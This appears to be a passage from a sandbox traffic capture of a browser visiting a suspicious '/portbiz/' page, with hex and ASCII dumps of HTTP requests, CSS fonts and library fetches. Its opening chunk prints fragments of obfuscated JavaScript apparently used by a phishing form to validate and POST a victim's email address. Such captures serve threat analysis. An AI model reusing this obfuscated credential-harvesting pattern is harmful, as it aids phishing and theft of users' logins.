                                                        2024-12-25 01:23:10 UTC1369INData Raw: 34 43 5c 78 36 46 5c 78 37 37 5c 78 36 35 5c 78 37 32 5c 78 34 33 5c 78 36 31 5c 78 37 33 5c 78 36 35 22 2c 22 5c 78 32 33 5c 78 36 31 5c 78 36 39 22 2c 22 5c 78 36 38 5c 78 37 34 5c 78 36 44 5c 78 36 43 22 2c 22 5c 78 32 33 5c 78 36 31 5c 78 36 39 5c 78 36 33 5c 78 36 38 22 2c 22 5c 78 36 38 5c 78 36 39 5c 78 36 34 5c 78 36 35 22 2c 22 5c 78 32 33 5c 78 36 44 5c 78 37 33 5c 78 36 37 22 2c 22 5c 78 32 33 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 44 5c 78 33 31 22 2c 22 5c 78 36 43 5c 78 36 46 5c 78 36 37 22 2c 22 5c 78 34 41 5c 78 35 33 5c 78 34 46 5c 78 34 45 22 2c 22 5c 78 35 30 5c 78 34 46 5c 78 35 33 5c 78 35 34 22 2c 22 5c 78 35 36 5c 78 36 35 5c 78 37 32 5c 78 36 39 5c 78 36 36 5c 78 37 39 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 32
                                                        Data Ascii: 4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x23\x61\x69","\x68\x74\x6D\x6C","\x23\x61\x69\x63\x68","\x68\x69\x64\x65","\x23\x6D\x73\x67","\x23\x66\x6F\x72\x6D\x2D\x31","\x6C\x6F\x67","\x4A\x53\x4F\x4E","\x50\x4F\x53\x54","\x56\x65\x72\x69\x66\x79\x69\x6E\x67\x2
                                                        2024-12-25 01:23:10 UTC937INData Raw: 5d 29 5b 5f 30 78 31 62 33 34 5b 32 32 5d 5d 28 29 3b 5f 30 78 33 39 32 65 78 36 5b 5f 30 78 31 62 33 34 5b 38 5d 5d 28 29 3b 76 61 72 20 5f 30 78 33 39 32 65 78 38 3d 24 28 5f 30 78 31 62 33 34 5b 31 39 5d 29 5b 5f 30 78 31 62 33 34 5b 30 5d 5d 28 29 3b 76 61 72 20 5f 30 78 33 39 32 65 78 39 3d 5f 30 78 33 39 32 65 78 38 3b 76 61 72 20 5f 30 78 33 39 32 65 78 65 3d 2f 5e 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 5c 2e 5c 2d 5d 29 2b 5c 40 28 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5c 2d 5d 29 2b 5c 2e 29 2b 28 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 7b 32 2c 34 7d 29 2b 24 2f 3b 76 61 72 20 5f 30 78 33 39 32 65 78 61 3d 5f 30 78 33 39 32 65 78 39 5b 5f 30 78 31 62 33 34 5b 31 36 5d 5d 28 5f 30 78 31 62 33 34 5b 31 35 5d 29 3b 76 61 72 20 5f 30 78 33 39 32 65 78 62 3d 5f 30
                                                        Data Ascii: ])[_0x1b34[22]]();_0x392ex6[_0x1b34[8]]();var _0x392ex8=$(_0x1b34[19])[_0x1b34[0]]();var _0x392ex9=_0x392ex8;var _0x392exe=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;var _0x392exa=_0x392ex9[_0x1b34[16]](_0x1b34[15]);var _0x392exb=_0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.44974835.190.80.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:08 UTC474OUTPOST /report/v4?s=WALG0QTwIft9Y7wjm%2BpyerU6Bn6BVJUZUGRwOsSWeseAJ4lLHXtu928LTLvuAoBWWW01WODeESIR9OO9IZRIlEW5Zu2DRRywhG4pkFEK9qd%2Fk2iHC4W2cqmw1JSZ1YMwj9nq HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 394
                                                        Content-Type: application/reports+json
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:08 UTC394OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 35 34 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 31 32 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 75 6e 67 62 75 63 6b 73 62 62 71 2e 63 6f 6d
                                                        Data Ascii: [{"age":1,"body":{"elapsed_time":3541,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.112.1","status_code":503,"type":"http.error"},"type":"network-error","url":"https://yungbucksbbq.com
                                                        2024-12-25 01:23:08 UTC168INHTTP/1.1 200 OK
                                                        Content-Length: 0
                                                        date: Wed, 25 Dec 2024 01:23:08 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449749104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:08 UTC843OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA
                                                        2024-12-25 01:23:09 UTC913INHTTP/1.1 302 Found
                                                        Date: Wed, 25 Dec 2024 01:23:08 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?
                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                        access-control-allow-origin: *
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Yy9wyaROMFHDQs7MFc4bfujgFUHGpw4tBma%2B5MircuTorOzxrb%2Fn8n6%2BxuFstboAKFP7tUZdndtlfoJMSamTD1QNbSOJarX6fEJepxwFfHdItTDJQ4iOmmu0W9mbl%2BCWF5s"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75062d38aa0f5b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1631&rtt_var=630&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1421&delivery_rate=1712609&cwnd=218&unsent_bytes=0&cid=e983793f98990c27&ts=450&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449757104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:11 UTC1011OUTGET /portbiz/css/css.css HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:12 UTC1066INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:11 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=2592000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Wed, 22 Jan 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125556
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eao2Wbv0SZ1I%2BUfWKNNJuKo6pktZwzuFoCIO4Pr4uYB7D1PBGX8GTUqU9foHbbiDhYgWOxqoevMBtPugybrTqzAN0Qc0xl1I3WAnh7xIE6lFNGng00VX4d%2BycOdKMWRNuaWF"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f75063f2d88729f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1982&rtt_var=745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1611&delivery_rate=1467336&cwnd=169&unsent_bytes=0&cid=f43447647a898fd2&ts=458&x=0"
                                                        2024-12-25 01:23:12 UTC303INData Raw: 33 66 39 64 0d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2f 76 32 35 2f 4a 54 55 53 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34 35 39 57 52 68 79 79 54 68 38 39 5a 4e 70 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72
                                                        Data Ascii: 3f9d/* cyrillic-ext */@font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 200; font-display: swap; src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format('woff2'); unicode-r
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2f 76 32 35 2f 4a 54 55 53 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34 35 39 57 31 68 79 79 54 68 38 39 5a 4e 70 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61
                                                        Data Ascii: DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 200; font-display: swap; src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) forma
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6d 6f 6e 74 73 65
                                                        Data Ascii: 2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 400; font-display: swap; src: url(https://fonts.gstatic.com/s/montse
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 46 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2f 76 32 35 2f 4a 54 55 53 6a 49 67 31 5f 69 36 74 38 6b 43 48 4b 6d 34
                                                        Data Ascii: , U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 400; font-display: swap; src: url(https://fonts.gstatic.com/s/montserrat/v25/JTUSjIg1_i6t8kCHKm4
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 2c 20 55 2b 30 31 31 30 2d 30 31 31 31 2c 20 55 2b 30 31 32 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6d 6f 6e 74
                                                        Data Ascii: , U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Montserrat'; font-style: normal; font-weight: 700; font-display: swap; src: url(https://fonts.gstatic.com/s/mont
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f
                                                        Data Ascii: woff2) format('woff2'); unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 300; font-display: swap; src: url(https://fonts.gstatic.com/s/
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 33 30 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 53 55 35 66 42 42 63 34 41 4d 50 36 6c 51 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c 20 55 2b 30 32 44 43 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34
                                                        Data Ascii: font-weight: 300; font-display: swap; src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fBBc4AMP6lQ.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 4b 4b 54 55 31 4b 76 6e 7a 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 33 30 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 57 78 4b
                                                        Data Ascii: KKTU1Kvnz.woff2) format('woff2'); unicode-range: U+0370-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; font-display: swap; src: url(https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Mu7WxK
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 33 30
                                                        Data Ascii: nicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; font-display: swap; src: url(https://fonts.gstatic.com/s/roboto/v30
                                                        2024-12-25 01:23:12 UTC1369INData Raw: 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 33 30 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 68 63 34 41 4d 50 36 6c 62 42 50 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 34 46 2c 20 55 2b 30 32 35 39 2c 20 55 2b 31 45 30 30 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 46 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c
                                                        Data Ascii: (https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fChc4AMP6lbBP.woff2) format('woff2'); unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-famil


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449758104.17.25.144432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:11 UTC564OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://yungbucksbbq.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-12-25 01:23:12 UTC963INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:11 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"5eb03fa9-4af4"
                                                        Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 1022811
                                                        Expires: Mon, 15 Dec 2025 01:23:11 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0W1nD1ZqSYs7uvbtr3ZdEeP%2BjXqZUcQEdBfe1ihdhVulA42moS%2FXTGG9U5MlzC%2F9AJnun2nNNnTlq9IkQiTVh8RECI%2FFRtiiyqnP3qgprErpErR0%2BU4apLZ9gizpqVdG2ALIDPXq"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
